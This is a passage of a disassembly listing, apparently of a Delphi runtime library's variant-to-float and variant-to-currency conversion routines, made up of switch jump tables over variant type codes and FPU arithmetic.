loc_40010C61: ; CODE XREF: sub_40010ABC+19C�j
mov eax, ebx
call sub_40010874
fstp [esp+18h+var_18]
wait
jmp loc_40010E01
; ---------------------------------------------------------------------------
loc_40010C71: ; CODE XREF: sub_40010ABC+1A1�j
mov eax, ebx
call sub_40010A0C
fstp [esp+18h+var_18]
wait
jmp loc_40010E01
; ---------------------------------------------------------------------------
loc_40010C81: ; CODE XREF: sub_40010ABC+1A3�j
test ah, 40h
jz loc_40010DE9
movzx eax, ax
and eax, 0FFFFBFFFh
cmp eax, 14h ; switch 21 cases
ja loc_40010DDC ; default
; jumptable 40010C9B cases 0,1,9,10,13-15
jmp ds:off_40010CA2[eax*4] ; switch jump
; ---------------------------------------------------------------------------
off_40010CA2 dd offset loc_40010DDC ; DATA XREF: sub_40010ABC+1DF�r
dd offset loc_40010DDC ; jump table for switch statement
dd offset loc_40010CF6
dd offset loc_40010D04
dd offset loc_40010D12
dd offset loc_40010D12
dd offset loc_40010D12
dd offset loc_40010D22
dd offset loc_40010D36
dd offset loc_40010DDC
dd offset loc_40010DDC
dd offset loc_40010D46
dd offset loc_40010DCE
dd offset loc_40010DDC
dd offset loc_40010DDC
dd offset loc_40010DDC
dd offset loc_40010D5D
dd offset loc_40010D74
dd offset loc_40010D88
dd offset loc_40010D9C
dd offset loc_40010DB5
; ---------------------------------------------------------------------------
loc_40010CF6: ; CODE XREF: sub_40010ABC+1DF�j
; DATA XREF: sub_40010ABC:off_40010CA2�o
mov eax, [ebx+8] ; jumptable 40010C9B case 2
fild word ptr [eax]
fstp [esp+18h+var_18]
wait
jmp loc_40010E01
; ---------------------------------------------------------------------------
loc_40010D04: ; CODE XREF: sub_40010ABC+1DF�j
; DATA XREF: sub_40010ABC:off_40010CA2�o
mov eax, [ebx+8] ; jumptable 40010C9B case 3
fild dword ptr [eax]
fstp [esp+18h+var_18]
wait
jmp loc_40010E01
; ---------------------------------------------------------------------------
loc_40010D12: ; CODE XREF: sub_40010ABC+1DF�j
; DATA XREF: sub_40010ABC:off_40010CA2�o
mov eax, ebx ; jumptable 40010C9B cases 4-6
call sub_400109C0
fstp [esp+18h+var_18]
wait
jmp loc_40010E01
; ---------------------------------------------------------------------------
loc_40010D22: ; CODE XREF: sub_40010ABC+1DF�j
; DATA XREF: sub_40010ABC:off_40010CA2�o
mov eax, [ebx+8] ; jumptable 40010C9B case 7
mov edx, [eax]
mov dword ptr [esp+18h+var_18], edx
mov edx, [eax+4]
mov dword ptr [esp+18h+var_18+4], edx
jmp loc_40010E01
; ---------------------------------------------------------------------------
loc_40010D36: ; CODE XREF: sub_40010ABC+1DF�j
; DATA XREF: sub_40010ABC:off_40010CA2�o
mov eax, ebx ; jumptable 40010C9B case 8
call sub_40010874
fstp [esp+18h+var_18]
wait
jmp loc_40010E01
; ---------------------------------------------------------------------------
loc_40010D46: ; CODE XREF: sub_40010ABC+1DF�j
; DATA XREF: sub_40010ABC:off_40010CA2�o
mov eax, [ebx+8] ; jumptable 40010C9B case 11
movsx eax, word ptr [eax]
mov [esp+18h+var_10], eax
fild [esp+18h+var_10]
fstp [esp+18h+var_18]
wait
jmp loc_40010E01
; ---------------------------------------------------------------------------
loc_40010D5D: ; CODE XREF: sub_40010ABC+1DF�j
; DATA XREF: sub_40010ABC:off_40010CA2�o
mov eax, [ebx+8] ; jumptable 40010C9B case 16
movsx eax, byte ptr [eax]
mov [esp+18h+var_10], eax
fild [esp+18h+var_10]
fstp [esp+18h+var_18]
wait
jmp loc_40010E01
; ---------------------------------------------------------------------------
loc_40010D74: ; CODE XREF: sub_40010ABC+1DF�j
; DATA XREF: sub_40010ABC:off_40010CA2�o
mov eax, [ebx+8] ; jumptable 40010C9B case 17
movzx eax, byte ptr [eax]
mov [esp+18h+var_10], eax
fild [esp+18h+var_10]
fstp [esp+18h+var_18]
wait
jmp short loc_40010E01
; ---------------------------------------------------------------------------
loc_40010D88: ; CODE XREF: sub_40010ABC+1DF�j
; DATA XREF: sub_40010ABC:off_40010CA2�o
mov eax, [ebx+8] ; jumptable 40010C9B case 18
movzx eax, word ptr [eax]
mov [esp+18h+var_10], eax
fild [esp+18h+var_10]
fstp [esp+18h+var_18]
wait
jmp short loc_40010E01
; ---------------------------------------------------------------------------
loc_40010D9C: ; CODE XREF: sub_40010ABC+1DF�j
; DATA XREF: sub_40010ABC:off_40010CA2�o
mov eax, [ebx+8] ; jumptable 40010C9B case 19
mov eax, [eax]
mov dword ptr [esp+18h+var_C], eax
xor eax, eax
mov dword ptr [esp+18h+var_C+4], eax
fild [esp+18h+var_C]
fstp [esp+18h+var_18]
wait
jmp short loc_40010E01
; ---------------------------------------------------------------------------
loc_40010DB5: ; CODE XREF: sub_40010ABC+1DF�j
; DATA XREF: sub_40010ABC:off_40010CA2�o
mov eax, [ebx+8] ; jumptable 40010C9B case 20
fild qword ptr [eax]
add esp, 0FFFFFFF8h
fstp [esp+20h+var_20]
wait
mov eax, ebx
call sub_40010960
fstp [esp+18h+var_18]
wait
jmp short loc_40010E01
; ---------------------------------------------------------------------------
loc_40010DCE: ; CODE XREF: sub_40010ABC+1DF�j
; DATA XREF: sub_40010ABC:off_40010CA2�o
mov eax, [ebx+8] ; jumptable 40010C9B case 12
call sub_40010ABC
fstp [esp+18h+var_18]
wait
jmp short loc_40010E01
; ---------------------------------------------------------------------------
loc_40010DDC: ; CODE XREF: sub_40010ABC+1D9�j
; sub_40010ABC+1DF�j
; DATA XREF: ...
mov eax, ebx ; default
; jumptable 40010C9B cases 0,1,9,10,13-15
call sub_400109C0
fstp [esp+18h+var_18]
wait
jmp short loc_40010E01
; ---------------------------------------------------------------------------
loc_40010DE9: ; CODE XREF: sub_40010ABC+1C8�j
mov edx, esp
mov eax, ebx
call sub_40010A70
test al, al
jnz short loc_40010E01
mov eax, ebx
call sub_400109C0
fstp [esp+18h+var_18]
wait
loc_40010E01: ; CODE XREF: sub_40010ABC+79�j
; sub_40010ABC+9D�j ...
fld [esp+18h+var_18]
add esp, 14h
pop ebx
retn
sub_40010ABC endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40010E0C proc near ; CODE XREF: sub_40011024+FA�p
; sub_40011024+1E1�p ...
var_14 = dword ptr -14h
var_10 = qword ptr -10h
var_4 = dword ptr -4
push ebp
mov ebp, esp
add esp, 0FFFFFFECh
push ebx
xor edx, edx
mov [ebp+var_14], edx
mov [ebp+var_4], edx
mov ebx, eax
xor eax, eax
push ebp
push offset loc_40010EB8
push dword ptr fs:[eax]
mov fs:[eax], esp
mov edx, ebx
lea eax, [ebp+var_4]
call sub_40011DFC
lea eax, [ebp+var_10]
push eax
push 0
push 400h
mov eax, [ebp+var_4]
push eax
mov eax, off_4001B0A0
mov eax, [eax]
call eax
mov edx, eax
sub edx, 80020005h
jz short loc_40010E61
sub edx, 7FFDFFFBh
jnz short loc_40010E8E
jmp short loc_40010E9A
; ---------------------------------------------------------------------------
loc_40010E61: ; CODE XREF: sub_40010E0C+49�j
lea eax, [ebp+var_14]
mov edx, [ebp+var_4]
call sub_40004B0C
mov eax, [ebp+var_14]
lea edx, [ebp+var_10]
call sub_40008EE8
test al, al
jnz short loc_40010E9A
movzx edx, word ptr [ebx]
mov cx, 6
mov eax, 80020005h
call sub_4000E034
jmp short loc_40010E9A
; ---------------------------------------------------------------------------
loc_40010E8E: ; CODE XREF: sub_40010E0C+51�j
movzx edx, word ptr [ebx]
mov cx, 6
call sub_4000E034
loc_40010E9A: ; CODE XREF: sub_40010E0C+53�j
; sub_40010E0C+6D�j ...
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_40010EBF
loc_40010EA7: ; CODE XREF: sub_40010E0C+B1�j
lea eax, [ebp+var_14]
call sub_40004884
lea eax, [ebp+var_4]
call sub_40005008
retn
; ---------------------------------------------------------------------------
loc_40010EB8: ; DATA XREF: sub_40010E0C+14�o
jmp loc_40004204
; ---------------------------------------------------------------------------
jmp short loc_40010EA7
; ---------------------------------------------------------------------------
loc_40010EBF: ; CODE XREF: sub_40010E0C+AB�j
; DATA XREF: sub_40010E0C+96�o
fild [ebp+var_10]
pop ebx
mov esp, ebp
pop ebp
retn
sub_40010E0C endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40010EC8 proc near ; CODE XREF: sub_40011024+1A0�p
; sub_40011024+37E�p
var_18 = word ptr -18h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = qword ptr -8
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
add esp, 0FFFFFFE8h
push ebx
mov ebx, eax
lea eax, [ebp+var_18]
push eax
call sub_4000CDD8
mov [ebp+var_18], 5
mov eax, [ebp+arg_0]
mov [ebp+var_10], eax
mov eax, [ebp+arg_4]
mov [ebp+var_C], eax
push 6
push 0
push 400h
lea eax, [ebp+var_18]
push eax
lea eax, [ebp+var_18]
push eax
mov eax, off_4001B064
mov eax, [eax]
call eax
movzx edx, word ptr [ebx]
mov cx, 6
call sub_4000E034
mov eax, [ebp+var_10]
mov dword ptr [ebp+var_8], eax
mov eax, [ebp+var_C]
mov dword ptr [ebp+var_8+4], eax
fild [ebp+var_8]
pop ebx
mov esp, ebp
pop ebp
retn 8
sub_40010EC8 endp
; =============== S U B R O U T I N E =======================================
sub_40010F28 proc near ; CODE XREF: sub_40011024+C8�p
; sub_40011024+EA�p ...
var_1C = qword ptr -1Ch
var_14 = byte ptr -14h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
push ebx
add esp, 0FFFFFFE8h
mov ebx, eax
lea eax, [esp+1Ch+var_14]
push eax
call sub_4000CDD8
push 6
push 0
push 400h
push ebx
lea eax, [esp+2Ch+var_14]
push eax
mov eax, off_4001B064
mov eax, [eax]
call eax
movzx edx, word ptr [ebx]
mov cx, 6
call sub_4000E034
mov eax, [esp+1Ch+var_C]
mov dword ptr [esp+1Ch+var_1C], eax
mov eax, [esp+1Ch+var_8]
mov dword ptr [esp+1Ch+var_1C+4], eax
fild [esp+1Ch+var_1C]
add esp, 18h
pop ebx
retn
sub_40010F28 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40010F74 proc near ; CODE XREF: sub_40011024+1F1�p
var_18 = byte ptr -18h
var_8 = qword ptr -8
push ebp
mov ebp, esp
add esp, 0FFFFFFE8h
push ebx
mov ebx, eax
lea eax, [ebp+var_18]
push eax
call sub_4000CDD8
xor eax, eax
push ebp
push offset loc_40010FC9
push dword ptr fs:[eax]
mov fs:[eax], esp
mov edx, ebx
lea eax, [ebp+var_18]
call sub_4000E700
lea eax, [ebp+var_18]
call ds:off_4001F29C
lea eax, [ebp+var_18]
call sub_40011024
fistp [ebp+var_8]
wait
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_40010FD0
loc_40010FC0: ; CODE XREF: sub_40010F74+5A�j
lea eax, [ebp+var_18]
call sub_4000E3D8
retn
; ---------------------------------------------------------------------------
loc_40010FC9: ; DATA XREF: sub_40010F74+15�o
jmp loc_40004204
; ---------------------------------------------------------------------------
jmp short loc_40010FC0
; ---------------------------------------------------------------------------
loc_40010FD0: ; CODE XREF: sub_40010F74+54�j
; DATA XREF: sub_40010F74+47�o
fild [ebp+var_8]
pop ebx
mov esp, ebp
pop ebp
retn
sub_40010F74 endp
; =============== S U B R O U T I N E =======================================
sub_40010FD8 proc near ; CODE XREF: sub_40011024+3A8�p
var_20 = dword ptr -20h
var_1C = byte ptr -1Ch
var_14 = dword ptr -14h
var_10 = dword ptr -10h
push ebx
push esi
push edi
add esp, 0FFFFFFECh
mov edi, edx
mov esi, eax
mov edx, esp
movzx eax, word ptr [esi]
call sub_40012D98
mov ebx, eax
test bl, bl
jz short loc_4001101A
lea eax, [esp+20h+var_1C]
push eax
call sub_4000CDD8
push 6
mov ecx, esi
lea edx, [esp+24h+var_1C]
mov eax, [esp+24h+var_20]
mov esi, [eax]
call dword ptr [esi+1Ch]
mov eax, [esp+20h+var_14]
mov [edi], eax
mov eax, [esp+20h+var_10]
mov [edi+4], eax
loc_4001101A: ; CODE XREF: sub_40010FD8+18�j
mov eax, ebx
add esp, 14h
pop edi
pop esi
pop ebx
retn
sub_40010FD8 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_40011024 proc near ; CODE XREF: sub_4000E9CC+130�p
; sub_40010F74+36�p ...
var_20 = qword ptr -20h
var_18 = qword ptr -18h
var_10 = dword ptr -10h
var_C = qword ptr -0Ch
push ebx
add esp, 0FFFFFFECh
mov ebx, eax
movzx eax, word ptr [ebx]
movzx edx, ax
cmp edx, 14h ; switch 21 cases
ja loc_400111F3 ; default
; jumptable 40011039 cases 10,14,15
jmp ds:off_40011040[edx*4] ; switch jump
; ---------------------------------------------------------------------------
off_40011040 dd offset loc_40011094 ; DATA XREF: sub_40011024+15�r
dd offset loc_400110A2 ; jump table for switch statement
dd offset loc_400110C6
dd offset loc_400110D8
dd offset loc_400110EA
dd offset loc_400110EA
dd offset loc_400110FA
dd offset loc_4001110C
dd offset loc_4001111C
dd offset loc_400111E3
dd offset loc_400111F3
dd offset loc_4001112C
dd offset loc_400111D2
dd offset loc_400111E3
dd offset loc_400111F3
dd offset loc_400111F3
dd offset loc_40011147
dd offset loc_40011162
dd offset loc_4001117D
dd offset loc_40011198
dd offset loc_400111B8
; ---------------------------------------------------------------------------
loc_40011094: ; CODE XREF: sub_40011024+15�j
; DATA XREF: sub_40011024:off_40011040�o
xor eax, eax ; jumptable 40011039 case 0
mov dword ptr [esp+18h+var_18], eax
mov dword ptr [esp+18h+var_18+4], eax
jmp loc_400113E0
; ---------------------------------------------------------------------------
loc_400110A2: ; CODE XREF: sub_40011024+15�j
; DATA XREF: sub_40011024:off_40011040�o
cmp byte_4001AA10, 0 ; jumptable 40011039 case 1
jz short loc_400110B8
mov dx, 6
mov ax, 1
call sub_4000DBF4
loc_400110B8: ; CODE XREF: sub_40011024+85�j
xor eax, eax
mov dword ptr [esp+18h+var_18], eax
mov dword ptr [esp+18h+var_18+4], eax
jmp loc_400113E0
; ---------------------------------------------------------------------------
loc_400110C6: ; CODE XREF: sub_40011024+15�j
; DATA XREF: sub_40011024:off_40011040�o
fild word ptr [ebx+8] ; jumptable 40011039 case 2
fmul ds:flt_400113E8
fistp [esp+18h+var_18]
wait
jmp loc_400113E0
; ---------------------------------------------------------------------------
loc_400110D8: ; CODE XREF: sub_40011024+15�j
; DATA XREF: sub_40011024:off_40011040�o
fild dword ptr [ebx+8] ; jumptable 40011039 case 3
fmul ds:flt_400113E8
fistp [esp+18h+var_18]
wait
jmp loc_400113E0
; ---------------------------------------------------------------------------
loc_400110EA: ; CODE XREF: sub_40011024+15�j
; DATA XREF: sub_40011024:off_40011040�o
mov eax, ebx ; jumptable 40011039 cases 4,5
call sub_40010F28
fistp [esp+18h+var_18]
wait
jmp loc_400113E0
; ---------------------------------------------------------------------------
loc_400110FA: ; CODE XREF: sub_40011024+15�j
; DATA XREF: sub_40011024:off_40011040�o
mov eax, [ebx+8] ; jumptable 40011039 case 6
mov dword ptr [esp+18h+var_18], eax
mov eax, [ebx+0Ch]
mov dword ptr [esp+18h+var_18+4], eax
jmp loc_400113E0
; ---------------------------------------------------------------------------
loc_4001110C: ; CODE XREF: sub_40011024+15�j
; DATA XREF: sub_40011024:off_40011040�o
mov eax, ebx ; jumptable 40011039 case 7
call sub_40010F28
fistp [esp+18h+var_18]
wait
jmp loc_400113E0
; ---------------------------------------------------------------------------
loc_4001111C: ; CODE XREF: sub_40011024+15�j
; DATA XREF: sub_40011024:off_40011040�o
mov eax, ebx ; jumptable 40011039 case 8
call sub_40010E0C
fistp [esp+18h+var_18]
wait
jmp loc_400113E0
; ---------------------------------------------------------------------------
loc_4001112C: ; CODE XREF: sub_40011024+15�j
; DATA XREF: sub_40011024:off_40011040�o
movsx eax, word ptr [ebx+8] ; jumptable 40011039 case 11
mov [esp+18h+var_10], eax
fild [esp+18h+var_10]
fmul ds:flt_400113E8
fistp [esp+18h+var_18]
wait
jmp loc_400113E0
; ---------------------------------------------------------------------------
loc_40011147: ; CODE XREF: sub_40011024+15�j
; DATA XREF: sub_40011024:off_40011040�o
movsx eax, byte ptr [ebx+8] ; jumptable 40011039 case 16
mov [esp+18h+var_10], eax
fild [esp+18h+var_10]
fmul ds:flt_400113E8
fistp [esp+18h+var_18]
wait
jmp loc_400113E0
; ---------------------------------------------------------------------------
loc_40011162: ; CODE XREF: sub_40011024+15�j
; DATA XREF: sub_40011024:off_40011040�o
movzx eax, byte ptr [ebx+8] ; jumptable 40011039 case 17
mov [esp+18h+var_10], eax
fild [esp+18h+var_10]
fmul ds:flt_400113E8
fistp [esp+18h+var_18]
wait
jmp loc_400113E0
; ---------------------------------------------------------------------------
loc_4001117D: ; CODE XREF: sub_40011024+15�j
; DATA XREF: sub_40011024:off_40011040�o
movzx eax, word ptr [ebx+8] ; jumptable 40011039 case 18
mov [esp+18h+var_10], eax
fild [esp+18h+var_10]
fmul ds:flt_400113E8
fistp [esp+18h+var_18]
wait
jmp loc_400113E0
; ---------------------------------------------------------------------------
loc_40011198: ; CODE XREF: sub_40011024+15�j
; DATA XREF: sub_40011024:off_40011040�o
mov eax, [ebx+8] ; jumptable 40011039 case 19
mov dword ptr [esp+18h+var_C], eax
xor eax, eax
mov dword ptr [esp+18h+var_C+4], eax
fild [esp+18h+var_C]
fmul ds:flt_400113E8
fistp [esp+18h+var_18]
wait
jmp loc_400113E0
; ---------------------------------------------------------------------------
loc_400111B8: ; CODE XREF: sub_40011024+15�j
; DATA XREF: sub_40011024:off_40011040�o
fild qword ptr [ebx+8] ; jumptable 40011039 case 20
add esp, 0FFFFFFF8h
fstp [esp+20h+var_20]
wait
mov eax, ebx
call sub_40010EC8
fistp [esp+18h+var_18]
wait
jmp loc_400113E0
; ---------------------------------------------------------------------------
loc_400111D2: ; CODE XREF: sub_40011024+15�j
; DATA XREF: sub_40011024:off_40011040�o
mov eax, [ebx+8] ; jumptable 40011039 case 12
call sub_40011024
fistp [esp+18h+var_18]
wait
jmp loc_400113E0
; ---------------------------------------------------------------------------
loc_400111E3: ; CODE XREF: sub_40011024+15�j
; DATA XREF: sub_40011024:off_40011040�o
mov eax, ebx ; jumptable 40011039 cases 9,13
call sub_40010F28
fistp [esp+18h+var_18]
wait
jmp loc_400113E0
; ---------------------------------------------------------------------------
loc_400111F3: ; CODE XREF: sub_40011024+F�j
; sub_40011024+15�j
; DATA XREF: ...
mov edx, eax ; default
; jumptable 40011039 cases 10,14,15
sub dx, 100h
jz short loc_40011203
dec dx
jz short loc_40011213
jmp short loc_40011223
; ---------------------------------------------------------------------------
loc_40011203: ; CODE XREF: sub_40011024+1D6�j
mov eax, ebx
call sub_40010E0C
fistp [esp+18h+var_18]
wait
jmp loc_400113E0
; ---------------------------------------------------------------------------
loc_40011213: ; CODE XREF: sub_40011024+1DB�j
mov eax, ebx
call sub_40010F74
fistp [esp+18h+var_18]
wait
jmp loc_400113E0
; ---------------------------------------------------------------------------
loc_40011223: ; CODE XREF: sub_40011024+1DD�j
test ah, 40h
jz loc_400113C8
movzx eax, ax
and eax, 0FFFFBFFFh
cmp eax, 14h ; switch 21 cases
ja loc_400113BB ; default
; jumptable 4001123D cases 0,1,9,10,13-15
jmp ds:off_40011244[eax*4] ; switch jump
; ---------------------------------------------------------------------------
off_40011244 dd offset loc_400113BB ; DATA XREF: sub_40011024+219�r
dd offset loc_400113BB ; jump table for switch statement
dd offset loc_40011298
dd offset loc_400112AC
dd offset loc_400112C0
dd offset loc_400112C0
dd offset loc_400112D0
dd offset loc_400112E4
dd offset loc_400112F4
dd offset loc_400113BB
dd offset loc_400113BB
dd offset loc_40011304
dd offset loc_400113AD
dd offset loc_400113BB
dd offset loc_400113BB
dd offset loc_400113BB
dd offset loc_40011321
dd offset loc_4001133E
dd offset loc_4001135B
dd offset loc_40011375
dd offset loc_40011394
; ---------------------------------------------------------------------------
loc_40011298: ; CODE XREF: sub_40011024+219�j
; DATA XREF: sub_40011024:off_40011244�o
mov eax, [ebx+8] ; jumptable 4001123D case 2
fild word ptr [eax]
fmul ds:flt_400113E8
fistp [esp+18h+var_18]
wait
jmp loc_400113E0
; ---------------------------------------------------------------------------
loc_400112AC: ; CODE XREF: sub_40011024+219�j
; DATA XREF: sub_40011024:off_40011244�o
mov eax, [ebx+8] ; jumptable 4001123D case 3
fild dword ptr [eax]
fmul ds:flt_400113E8
fistp [esp+18h+var_18]
wait
jmp loc_400113E0
; ---------------------------------------------------------------------------
loc_400112C0: ; CODE XREF: sub_40011024+219�j
; DATA XREF: sub_40011024:off_40011244�o
mov eax, ebx ; jumptable 4001123D cases 4,5
call sub_40010F28
fistp [esp+18h+var_18]
wait
jmp loc_400113E0
; ---------------------------------------------------------------------------
loc_400112D0: ; CODE XREF: sub_40011024+219�j
; DATA XREF: sub_40011024:off_40011244�o
mov eax, [ebx+8] ; jumptable 4001123D case 6
mov edx, [eax]
mov dword ptr [esp+18h+var_18], edx
mov edx, [eax+4]
mov dword ptr [esp+18h+var_18+4], edx
jmp loc_400113E0
; ---------------------------------------------------------------------------
loc_400112E4: ; CODE XREF: sub_40011024+219�j
; DATA XREF: sub_40011024:off_40011244�o
mov eax, ebx ; jumptable 4001123D case 7
call sub_40010F28
fistp [esp+18h+var_18]
wait
jmp loc_400113E0
; ---------------------------------------------------------------------------
loc_400112F4: ; CODE XREF: sub_40011024+219�j
; DATA XREF: sub_40011024:off_40011244�o
mov eax, ebx ; jumptable 4001123D case 8
call sub_40010E0C
fistp [esp+18h+var_18]
wait
jmp loc_400113E0
; ---------------------------------------------------------------------------
loc_40011304: ; CODE XREF: sub_40011024+219�j
; DATA XREF: sub_40011024:off_40011244�o
mov eax, [ebx+8] ; jumptable 4001123D case 11
movsx eax, word ptr [eax]
mov [esp+18h+var_10], eax
fild [esp+18h+var_10]
fmul ds:flt_400113E8
fistp [esp+18h+var_18]
wait
jmp loc_400113E0
; ---------------------------------------------------------------------------
loc_40011321: ; CODE XREF: sub_40011024+219�j
; DATA XREF: sub_40011024:off_40011244�o
mov eax, [ebx+8] ; jumptable 4001123D case 16
movsx eax, byte ptr [eax]
mov [esp+18h+var_10], eax
fild [esp+18h+var_10]
fmul ds:flt_400113E8
fistp [esp+18h+var_18]
wait
jmp loc_400113E0
; ---------------------------------------------------------------------------
loc_4001133E: ; CODE XREF: sub_40011024+219�j
; DATA XREF: sub_40011024:off_40011244�o
mov eax, [ebx+8] ; jumptable 4001123D case 17
movzx eax, byte ptr [eax]
mov [esp+18h+var_10], eax
fild [esp+18h+var_10]
fmul ds:flt_400113E8
fistp [esp+18h+var_18]
wait
jmp loc_400113E0
; ---------------------------------------------------------------------------
loc_4001135B: ; CODE XREF: sub_40011024+219�j
; DATA XREF: sub_40011024:off_40011244�o
mov eax, [ebx+8] ; jumptable 4001123D case 18
movzx eax, word ptr [eax]
mov [esp+18h+var_10], eax
fild [esp+18h+var_10]
fmul ds:flt_400113E8
fistp [esp+18h+var_18]
wait
jmp short loc_400113E0
; ---------------------------------------------------------------------------
loc_40011375: ; CODE XREF: sub_40011024+219�j
; DATA XREF: sub_40011024:off_40011244�o
mov eax, [ebx+8] ; jumptable 4001123D case 19
mov eax, [eax]
mov dword ptr [esp+18h+var_C], eax
xor eax, eax
mov dword ptr [esp+18h+var_C+4], eax
fild [esp+18h+var_C]
fmul ds:flt_400113E8
fistp [esp+18h+var_18]
wait
jmp short loc_400113E0
; ---------------------------------------------------------------------------
loc_40011394: ; CODE XREF: sub_40011024+219�j
; DATA XREF: sub_40011024:off_40011244�o
mov eax, [ebx+8] ; jumptable 4001123D case 20
fild qword ptr [eax]
add esp, 0FFFFFFF8h
fstp [esp+20h+var_20]
wait
mov eax, ebx
call sub_40010EC8
fistp [esp+18h+var_18]
wait
jmp short loc_400113E0
; ---------------------------------------------------------------------------
loc_400113AD: ; CODE XREF: sub_40011024+219�j
; DATA XREF: sub_40011024:off_40011244�o
mov eax, [ebx+8] ; jumptable 4001123D case 12
call sub_40011024
fistp [esp+18h+var_18]
wait
jmp short loc_400113E0
; ---------------------------------------------------------------------------
loc_400113BB: ; CODE XREF: sub_40011024+213�j
; sub_40011024+219�j
; DATA XREF: ...
mov eax, ebx ; default
; jumptable 4001123D cases 0,1,9,10,13-15
call sub_40010F28
fistp [esp+18h+var_18]
wait
jmp short loc_400113E0
; ---------------------------------------------------------------------------
loc_400113C8: ; CODE XREF: sub_40011024+202�j
mov edx, esp
mov eax, ebx
call sub_40010FD8
test al, al
jnz short loc_400113E0
mov eax, ebx
call sub_40010F28
fistp [esp+18h+var_18]
wait
loc_400113E0: ; CODE XREF: sub_40011024+79�j
; sub_40011024+9D�j ...
fild [esp+18h+var_18]
add esp, 14h
pop ebx
retn
sub_40011024 endp
; ---------------------------------------------------------------------------
flt_400113E8 dd 1.0e4 ; DATA XREF: sub_40011024+A5�r
; sub_40011024+B7�r ...
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_400113EC proc near ; CODE XREF: sub_400116DC+142�p
; sub_400116DC+3A0�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ebx
mov ebx, eax
mov eax, ebx
call sub_40005008
push eax
push 0
push 400h
push [ebp+arg_4]
push [ebp+arg_0]
mov eax, off_4001AF04
mov eax, [eax]
call eax
mov cx, 8
mov dx, 6
call sub_4000E034
pop ebx
pop ebp
retn 8
sub_400113EC endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40011424 proc near ; CODE XREF: sub_400116DC+15F�p
; sub_400116DC+3BF�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ebx
mov ebx, eax
mov eax, ebx
call sub_40005008
push eax
push 0
push 400h
push [ebp+arg_4]
push [ebp+arg_0]
mov eax, off_4001AFC8
mov eax, [eax]
call eax
mov cx, 8
mov dx, 7
call sub_4000E034
pop ebx
pop ebp
retn 8
sub_40011424 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4001145C proc near ; CODE XREF: sub_400116DC+19F�p
; sub_400116DC+3ED�p ...
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
xor ecx, ecx
push ecx
push ecx
push ecx
push ecx
push ebx
push esi
mov ebx, edx
mov esi, eax
xor eax, eax
push ebp
push offset loc_40011514
push dword ptr fs:[eax]
mov fs:[eax], esp
mov eax, ebx
call sub_40005008
push eax
push 0
push 400h
push esi
mov eax, off_4001B058
mov eax, [eax]
call eax
mov cx, 8
mov dx, 0Bh
call sub_4000E034
movzx eax, byte_4001AA18
sub al, 1
jb short loc_400114F9
jz short loc_400114B2
dec al
jz short loc_400114D3
jmp short loc_400114F4
; ---------------------------------------------------------------------------
loc_400114B2: ; CODE XREF: sub_4001145C+4E�j
lea eax, [ebp+var_8]
mov edx, [ebx]
call sub_40004B0C
mov eax, [ebp+var_8]
lea edx, [ebp+var_4]
call sub_40007A58
mov edx, [ebp+var_4]
mov eax, ebx
call sub_40005158
jmp short loc_400114F9
; ---------------------------------------------------------------------------
loc_400114D3: ; CODE XREF: sub_4001145C+52�j
lea eax, [ebp+var_10]
mov edx, [ebx]
call sub_40004B0C
mov eax, [ebp+var_10]
lea edx, [ebp+var_C]
call sub_400079BC
mov edx, [ebp+var_C]
mov eax, ebx
call sub_40005158
jmp short loc_400114F9
; ---------------------------------------------------------------------------
loc_400114F4: ; CODE XREF: sub_4001145C+54�j
call sub_4000DC90
loc_400114F9: ; CODE XREF: sub_4001145C+4C�j
; sub_4001145C+75�j ...
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_4001151B
loc_40011506: ; CODE XREF: sub_4001145C+BD�j
lea eax, [ebp+var_10]
mov edx, 4
call sub_400048A8
retn
; ---------------------------------------------------------------------------
loc_40011514: ; DATA XREF: sub_4001145C+12�o
jmp loc_40004204
; ---------------------------------------------------------------------------
jmp short loc_40011506
; ---------------------------------------------------------------------------
loc_4001151B: ; CODE XREF: sub_4001145C+B7�j
; DATA XREF: sub_4001145C+A5�o
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
sub_4001145C endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40011524 proc near ; CODE XREF: sub_400116DC+255�p
; sub_400116DC+4A4�p ...
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = byte ptr -10h
var_8 = dword ptr -8
push ebp
mov ebp, esp
add esp, 0FFFFFFE8h
push ebx
push esi
xor ecx, ecx
mov [ebp+var_14], ecx
mov [ebp+var_18], ecx
mov esi, edx
mov ebx, eax
xor eax, eax
push ebp
push offset loc_400115E3
push dword ptr fs:[eax]
mov fs:[eax], esp
lea eax, [ebp+var_10]
push eax
call sub_4000CDD8
xor eax, eax
push ebp
push offset loc_400115C1
push dword ptr fs:[eax]
mov fs:[eax], esp
push 8
push 0
push 400h
push ebx
lea eax, [ebp+var_10]
push eax
mov eax, off_4001B064
mov eax, [eax]
call eax
movzx edx, word ptr [ebx]
mov cx, 100h
call sub_4000E034
lea eax, [ebp+var_14]
push eax
lea eax, [ebp+var_18]
mov edx, [ebp+var_8]
call sub_4000511C
mov eax, [ebp+var_18]
mov ecx, 7FFFFFFFh
mov edx, 1
call sub_40005174
